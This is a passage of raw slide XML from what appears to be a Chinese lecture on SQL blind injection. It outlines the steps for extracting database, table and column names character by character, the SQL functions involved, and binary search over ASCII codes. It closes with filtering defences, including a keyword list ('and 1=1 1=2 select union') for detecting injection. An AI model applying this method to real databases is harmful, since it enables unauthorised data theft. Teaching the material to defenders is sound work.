              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>盲注的过程：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查找数据库名的长度</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查找数据库名的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查找数据表的数量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查找某个表的名称长度和名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查找某个表下所有字段数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查找某个表中每个字段的名称长度和具体名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获取某条记录某个字段值的长度及内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7127240" y="1721485"/>
            <a:ext cx="4589145" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>重要函数：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>返回字符串的长度</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>substr(str,pos,num)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> ：截取指定位置指定长度的字符串</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mid(str,pos,num)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>截取指定位置指定长度的字符串</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ascii()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>查询ascii码中对应的值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>count(column_name)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>：返回指定列的值的数目(NULL 不计入)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94716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SQL</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盲注</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攻击</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2660" b="1" kern="10" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>——</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二分法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="896620"/>
            <a:ext cx="9437370" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>二分法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>进行手工盲注。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5880100"/>
            <a:ext cx="6921500" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>说明数据库名的第一个字符ASCII码为99</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5995035" y="1624330"/>
            <a:ext cx="6189345" cy="3883660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="椭圆 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9779635" y="3317875"/>
            <a:ext cx="1080135" cy="25336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113030" y="1355090"/>
            <a:ext cx="6155055" cy="4422775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="椭圆 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159250" y="5382260"/>
            <a:ext cx="572135" cy="30035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0760" y="939165"/>
            <a:ext cx="9557385" cy="4799965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>不信任用户的输入，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加强过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>COOKIES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>的提交</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>进行过滤，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>过滤特殊符号，对一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>&amp;*%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>￥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>#@/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>等等的符号，以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>转义符号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>进行严格的过滤与拦截。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>对前端的网站进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>安全函数的变量过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>，网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>端的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>过滤检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>是否含有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>注入的非法参数，比如一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>注入代码，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>and 1=1 1=2 select union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>等查询的语句过滤。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
